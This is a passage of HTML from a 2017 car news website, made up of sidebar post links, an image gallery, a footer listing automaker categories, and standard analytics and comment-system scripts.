<ul class="feature-posts-list"><li><div class="post-thumb"><a href="http://www.inautonews.com/biggest-parking-space-for-evs-will-be-in-finland"><img src="http://www.inautonews.com/wp-content/uploads/2017/05/Biggest-parking-space-for-EVs-will-be-in-Finland-90x90.jpg" height="90" width="90"></a></div><h3><a href="http://www.inautonews.com/biggest-parking-space-for-evs-will-be-in-finland">Biggest parking space for EVs will be in Finland</a></h3><br /><div class="clear"></div></li><li><div class="post-thumb"><a href="http://www.inautonews.com/classics-lancia-delta-s4-stradale-is-high-priced-italian-fashion"><img src="http://www.inautonews.com/wp-content/uploads/2017/05/Classics-–-Lancia-Delta-S4-Stradale-is-high-priced-Italian-fashion-1-90x90.jpg" height="90" width="90"></a></div><h3><a href="http://www.inautonews.com/classics-lancia-delta-s4-stradale-is-high-priced-italian-fashion">Classics – Lancia Delta S4 &#8216;Stradale&#8217; is high priced Italian fashion</a></h3><br /><div class="clear"></div></li><li><div class="post-thumb"><a href="http://www.inautonews.com/video-quirky-suzuki-vitara-ad-talks-about-used-suv-in-epic-fashion"><img src="http://www.inautonews.com/wp-content/uploads/2017/05/Video-Quirky-Suzuki-Vitara-ad-talks-about-used-SUV-in-epic-fashion-90x90.jpg" height="90" width="90"></a></div><h3><a href="http://www.inautonews.com/video-quirky-suzuki-vitara-ad-talks-about-used-suv-in-epic-fashion">[Video] Quirky Suzuki Vitara ad talks about used SUV in epic fashion</a></h3><br /><div class="clear"></div></li><li><div class="post-thumb"><a href="http://www.inautonews.com/report-volkswagen-roadmap-shows-this-years-introductions"><img src="http://www.inautonews.com/wp-content/uploads/2017/05/Report-–-Volkswagen-roadmap-shows-this-year’s-introductions-90x90.jpg" height="90" width="90"></a></div><h3><a href="http://www.inautonews.com/report-volkswagen-roadmap-shows-this-years-introductions">Report – Volkswagen roadmap shows this year’s introductions</a></h3><br /><div class="clear"></div></li><li><div class="post-thumb"><a href="http://www.inautonews.com/classics-get-your-rally-fixation-in-order-with-this-1985-audi-sport-quattro"><img src="http://www.inautonews.com/wp-content/uploads/2017/05/Classics-–-Get-your-rally-fixation-in-order-with-this-1985-Audi-Sport-Quattro-1-90x90.jpg" height="90" width="90"></a></div><h3><a href="http://www.inautonews.com/classics-get-your-rally-fixation-in-order-with-this-1985-audi-sport-quattro">Classics – Get your rally fixation in order with this 1985 Audi Sport Quattro</a></h3><br /><div class="clear"></div></li></ul><div class="clear"></div></div><div id="widget_tptn_pop-3" class="tabbertab widget_widget_tptn_pop"><h2 class="widgettitle">Most Popular Now</h2>
<div class="tptn_posts tptn_posts_widget"><ul class="feature-posts-list"><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/list-of-world-record-highways" rel="bookmark"  class="tptn_link"><span class="tptn_title">List of World record highways</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/10-busiest-junctions-in-the-world" rel="bookmark"  class="tptn_link"><span class="tptn_title">10 Busiest Junctions in the world</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/mclaren-denies-dennis-to-challenge-new-fia-rule" rel="bookmark"  class="tptn_link"><span class="tptn_title">McLaren denies Dennis to challenge new FIA rule</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/mclaren-denies-dennis-to-challenge-new-fia-rule" rel="bookmark"  class="tptn_link"><span class="tptn_title">McLaren denies Dennis to challenge new FIA rule</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/jackie-stewart-tells-mercedes-to-quit-f1" rel="bookmark"  class="tptn_link"><span class="tptn_title">Jackie Stewart tells Mercedes to quit F1</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/jackie-stewart-tells-mercedes-to-quit-f1" rel="bookmark"  class="tptn_link"><span class="tptn_title">Jackie Stewart tells Mercedes to quit F1</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/hamilton-to-ferrari-rumours-fire-in-bahrain" rel="bookmark"  class="tptn_link"><span class="tptn_title">Hamilton-to-Ferrari rumours fire in Bahrain</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/ferrari-re-opens-door-to-working-with-red-bull" rel="bookmark"  class="tptn_link"><span class="tptn_title">Ferrari re-opens door to working with Red Bull</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/test-drive-renault-captur-0-9-tce-90-fast-review" rel="bookmark"  class="tptn_link"><span class="tptn_title">Test Drive: Renault Captur 0.9 &#8211; TCe 90 – fast&hellip;</span></a></span></h3></li><li><h3><span class="tptn_after_thumb"><a href="http://www.inautonews.com/2015-frankfurt-motor-show-live-2016-skoda-superb-combi-sportline" rel="bookmark"  class="tptn_link"><span class="tptn_title">2015 Frankfurt Motor Show LIVE: 2016 Skoda Superb Combi&hellip;</span></a></span></h3></li></ul></div></div></div>
			<div class="clear"></div></div><div class="widget widget_widget_tptn_pop" id="widget_tptn_pop-2"><h3 class="title"><span>Latest Galeries</span></h3></div><div class="clear"></div>
<div class="gallery2-class">
<a href='http://www.inautonews.com/classics-lancia-delta-s4-stradale-is-high-priced-italian-fashion/classics-lancia-delta-s4-stradale-is-high-priced-italian-fashion-3'><img width="150" height="84" src="http://www.inautonews.com/wp-content/uploads/2017/05/Classics-–-Lancia-Delta-S4-Stradale-is-high-priced-Italian-fashion-3-150x84.jpg" class="attachment-thumbnail" alt="Classics – Lancia Delta S4 &#039;Stradale&#039; is high priced Italian fashion 3" /></a><a href='http://www.inautonews.com/classics-get-your-rally-fixation-in-order-with-this-1985-audi-sport-quattro/classics-get-your-rally-fixation-in-order-with-this-1985-audi-sport-quattro-10'><img width="150" height="84" src="http://www.inautonews.com/wp-content/uploads/2017/05/Classics-–-Get-your-rally-fixation-in-order-with-this-1985-Audi-Sport-Quattro-10-150x84.jpg" class="attachment-thumbnail" alt="Classics – Get your rally fixation in order with this 1985 Audi Sport Quattro 10" /></a><a href='http://www.inautonews.com/classics-vanity-stroking-gold-plated-lamborghini-countach-is-up-for-grabs/classics-vanity-stroking-gold-plated-lamborghini-countach-is-up-for-grabs-1'><img width="150" height="84" src="http://www.inautonews.com/wp-content/uploads/2017/05/Classics-–-Vanity-stroking-gold-plated-Lamborghini-Countach-is-up-for-grabs-1-150x84.jpg" class="attachment-thumbnail" alt="Classics – Vanity-stroking gold-plated Lamborghini Countach is up for grabs 1" /></a><a href='http://www.inautonews.com/incredible-talbot-lago-teardrop-is-going-to-auction/incredible-talbot-lago-teardrop-is-going-to-auction-5'><img width="150" height="84" src="http://www.inautonews.com/wp-content/uploads/2017/05/Incredible-Talbot-Lago-teardrop-is-going-to-auction-5-150x84.jpg" class="attachment-thumbnail" alt="Incredible Talbot-Lago teardrop is going to auction 5" /></a><a href='http://www.inautonews.com/sutton-bespoke-takes-the-range-rover-sport-for-a-spin/sutton-bespoke-takes-the-range-rover-sport-for-a-spin-4'><img width="150" height="84" src="http://www.inautonews.com/wp-content/uploads/2017/05/Sutton-Bespoke-takes-the-Range-Rover-Sport-for-a-spin-4-150x84.jpg" class="attachment-thumbnail" alt="Sutton Bespoke takes the Range Rover Sport for a spin 4" /></a><a href='http://www.inautonews.com/2018-peugeot-308-comes-with-enhanced-features-new-diesel-and-auto/2018-peugeot-308-comes-with-enhanced-features-new-diesel-and-auto-5'><img width="150" height="84" src="http://www.inautonews.com/wp-content/uploads/2017/05/2018-Peugeot-308-comes-with-enhanced-features-new-diesel-and-auto-5-150x84.jpg" class="attachment-thumbnail" alt="2018 Peugeot 308 comes with enhanced features, new diesel and auto 5" /></a></div></div>

    </main><!-- #main -->

    <footer id="colophon" class="site-footer" role="contentinfo">

<div class="footer-widgets widgets widget-columns-3">
                    <div class="column">
                      <div class="widget widget_text" id="text-4"><h3 class="title">Receive Our Newsletter</h3>
                      <div style="float:left; height:50px; margin:0px;"><form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=inautonews', 'popupwindow', 'scrollbars=yes,width=570,height=600');return true"><input type="text" style="width:65%; height:40px; margin-top:0px; border: 1px solid #c7c7c7; background-color:#f9f9f9;" name="email"/><input type="hidden" value="inautonews" name="uri"/><input type="hidden" name="loc" value="en_US"/><input type="submit" style="margin:10px 0px 0px 5px;" value="Subscribe"/></form></div>
                      </div>
                      
		<div class="clear"></div></div>                    <!-- .column -->
                
                    <div class="column">
                        <div class="widget widget_text" id="text-4"><h3 class="title">Subscribe to RSS</h3>	
                        		
		<div class="clear"></div></div>                    </div><!-- .column -->
             
                    <div class="column">
                        <div class="widget widget_text" id="text-5"><h3 class="title">Follow us on Social Media</h3>
                        <div class="share" style="float:left;">
                            <a href="https://twitter.com/inautonews" target="_blank" title="Inautonws on Twitter" class="twitter"></a>
                            <a href="https://www.facebook.com/inautonews" target="_blank" title="Inautonws on Facebook" class="facebook"></a>
                            <a href="https://plus.google.com/+Inautonewsplus" target="_blank" title="Inautonews on Google+" class="gplus"></a>
                            <div class="clear"></div>
                        </div>
		<div class="clear"></div></div>                    </div><!-- .column -->

                
                    <div class="column">
                                            </div><!-- .column -->

                
                  <div class="clear"></div>
            </div><!-- .footer-widgets -->
            
            
            <div id="title_message">
            <div class="footer-widgets widgets widget-columns-4">
                
<div class="column">
<div class="widget widget_text" id="text-4"> <h3 class="title">News</h3> </div>
<div style=" margin-top:-20px;">
<a href="http://www.inautonews.com/category/home/news">All the news ordered by time</a> <br />
<a href="http://www.inautonews.com/category/home/producers">Industry</a> <br />
<a href="http://www.inautonews.com/category/home/technology">Technology</a> <br />
<a href="http://www.inautonews.com/category/home/technology">Tuners</a> <br />
<a href="http://www.inautonews.com/category/home/videos">Videos</a> <br />
<a href="http://www.inautonews.com/category/home/safety-home">Safety</a> <br />
<a href="http://www.inautonews.com/category/home/car-crashes">Car Crashes</a> <br />
<a href="http://www.inautonews.com/category/home/concept">Concepts</a> <br />
<a href="http://www.inautonews.com/category/home/spy">Spy Photos</a> <br /><br />
</div>
<div class="widget widget_text" id="text-4"> <h3 class="title">IN DEPTH</h3> </div>
<div style=" margin-top:-20px;">
<a href="http://www.inautonews.com/category/home/motor-shows">Motor Shows</a> <br />
     <a href="http://www.inautonews.com/category/home/motorsport">Motor Sport</a> <br />
     <a href="http://www.inautonews.com/category/test-drive-2">Test Drive</a> <br />
     <a href="http://www.inautonews.com/category/home/editors">Editors Choice</a> <br />
</div>
		<div class="clear"></div></div>                    <!-- .column -->
                
                    <div class="column">
                        <div class="widget widget_text" id="text-4"><h3 class="title">Automakers</h3>			<div class="textwidget"></div>
     <a href="http://www.inautonews.com/category/manufacturers/acura">Acura</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/alfa">Alfa Romeo</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/aston-martin">Aston Martin</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/audi">Audi</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/bentley">Bentley</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/bmw">BMW</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/bugatti">Bugatti</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/buick">Buick</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/cadillac">Cadillac</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/caterham">Caterharm</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/chevrolet">Chevrolet</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/chrysler">Chrysler</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/citroen">Citroen</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/dacia">Dacia</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/dodge">Dodge</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/ferrari">Ferrari</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/fiat">Fiat</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/fiat">Fisker</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/ford">Ford</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/gmc">GMC</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/holden">Holden</a> <br />
	 <div class="clear"></div></div>                    </div><!-- .column -->
     <div class="column">
     <div class="widget widget_text" id="text-5"><h3 class="title"></h3>			<div class="textwidget"></div>
    <a href="http://www.inautonews.com/category/manufacturers/honda">Honda</a> <br />
          <a href="http://www.inautonews.com/category/manufacturers/hummer">Hummer</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/hyundai">Hyundai</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/infiniti">Infiniti</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/jaguar">Jaguar</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/jeep">Jeep</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/kia">Kia</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/koenigsegg">Koenigsegg</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/lamborghini">Lamborghini</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/lancia">Lancia</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/land-rover">Land Rover</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/lexus">Lexus</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/lotus">Lotus</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/lincoln">Lincoln</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/mclaren">McLaren</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/maserati">Maserati</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/mazda">Mazda</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/maybach">Mayback</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/mercedes">Mercede-Benz</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/mini">Mini</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/mitsubishi">Mitshubishi</a> <br />
	 <div class="clear"></div></div></div><!-- .column -->
     <div class="column">
     <div class="widget widget_text" id="text-5"><h3 class="title"></h3><div class="textwidget"></div>
    <a href="http://www.inautonews.com/category/manufacturers/nissan">Nissan</a> <br />
         <a href="http://www.inautonews.com/category/manufacturers/pagani">Pagani</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/peugeot">Peugeot</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/porsche">Porsche</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/opel">Opel</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/dodge">RAM</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/renault">Renault</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/rolls">Rolls Royce</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/saab">Saab</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/saturn">Saturn</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/scion">Scion</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/seat">Seat</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/skoda">Skoda</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/spyker">Spyker</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/subaru">Subaru</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/suzuki">Suzuki</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/tata">Tata</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/tesla">Tesla</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/vauxhall">Vauxhall</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/volkswagen">Volkswagen</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/toyota">Toyota</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/volvo">Volvo</a> <br />
     <a href="http://www.inautonews.com/category/manufacturers/others">Others</a> <br />
	 <div class="clear"></div></div>                    </div><!-- .column -->
                    <div class="column">
                                            </div><!-- .column -->

                
                  <div class="clear"></div>
            </div><!-- .footer-widgets -->
            </div>

       <!-- .footer-widgets -->

            <hr class="site-footer-separator">

      


        <div class="site-info">
            <p class="copyright">
                Copyright &copy; 2017 &mdash; INAUTONEWS. All Rights Reserved<br >
                
                <a href="http://www.inautonews.com/singles/about.html">About us</a>&nbsp;&nbsp;&nbsp;     /&nbsp;&nbsp;&nbsp;<a href="http://www.inautonews.com/singles/advertise.html">Advertisement</a>&nbsp;&nbsp;&nbsp;      /&nbsp;&nbsp;&nbsp;     <a href="http://www.inautonews.com/singles/contact.html">Contact</a>&nbsp;&nbsp;&nbsp;     /&nbsp;&nbsp;&nbsp;     <a href="http://www.inautonews.com/singles/tip.html">Send us a tip</a>&nbsp;&nbsp;&nbsp; /&nbsp;&nbsp;&nbsp;
<a href="http://www.inautonews.com/singles/terms.html">Term of Use</a>&nbsp;&nbsp;&nbsp; /&nbsp;&nbsp;&nbsp;<a href="http://www.inautonews.com/singles/privacy.html">Privacy Policy</a>&nbsp;&nbsp;&nbsp;     /&nbsp;&nbsp;&nbsp;<a href="https://plus.google.com/+Inautonewsplus" rel="publisher">Google+</a>
            </p>

         
        </div><!-- .site-info -->
    </footer><!-- #colophon -->

</div>
<script>(function($){$(document).ready(function(){});})(jQuery);</script><script type='text/javascript' src='http://www.inautonews.com/wp-includes/js/comment-reply.min.js?ver=4.1.17'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/jquery.mmenu.min.all.js?ver=1.0'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/jquery.touchSwipe.min.js?ver=1.0'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/jquery.carouFredSel-6.2.1-packed.js?ver=1.0'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/flickity.pkgd.min.js?ver=1.0'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/jquery.fitvids.js?ver=1.0'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/superfish.min.js?ver=1.0'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/tabs.js?ver=1.0'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var zoomOptions = {"slideshow_auto":"1","slideshow_speed":"3000"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/functions.js?ver=1.0'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201719'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/functions/wpzoom/assets/js/galleria.js'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/functions/wpzoom/assets/js/wzslider.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var embedVars = {"disqusConfig":{"platform":"wordpress@4.1.17","language":""},"disqusIdentifier":"312584 http:\/\/www.inautonews.com\/?p=312584","disqusShortname":"ina2","disqusTitle":"Leaked \u2013 2018 Renault Megane RS shows sexy lines","disqusUrl":"http:\/\/www.inautonews.com\/leaked-2018-renault-megane-rs-shows-sexy-lines","options":{"manualSync":false},"postId":"312584"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.17'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var countVars = {"disqusShortname":"ina2"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.17'></script>

<!-- Histats.com  START (hidden counter)-->
<script type="text/javascript">document.write(unescape("%3Cscript src=%27http://s10.histats.com/js15.js%27 type=%27text/javascript%27%3E%3C/script%3E"));</script>
<a href="http://www.histats.com" rel="nofollow" target="_blank" title="free site statistics" ><script  type="text/javascript" >
try {Histats.start(1,976179,4,0,0,0,"");
Histats.track_hits();} catch(err){};
</script></a>
<noscript><a href="http://www.histats.com" target="_blank"><img  src="http://sstatic1.histats.com/0.gif?976179&101" alt="free site statistics" border="0"></a></noscript>
<!-- Histats.com  END  -->

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-7100910-2', 'auto');
  ga('send', 'pageview');

</script>
</body>
</html>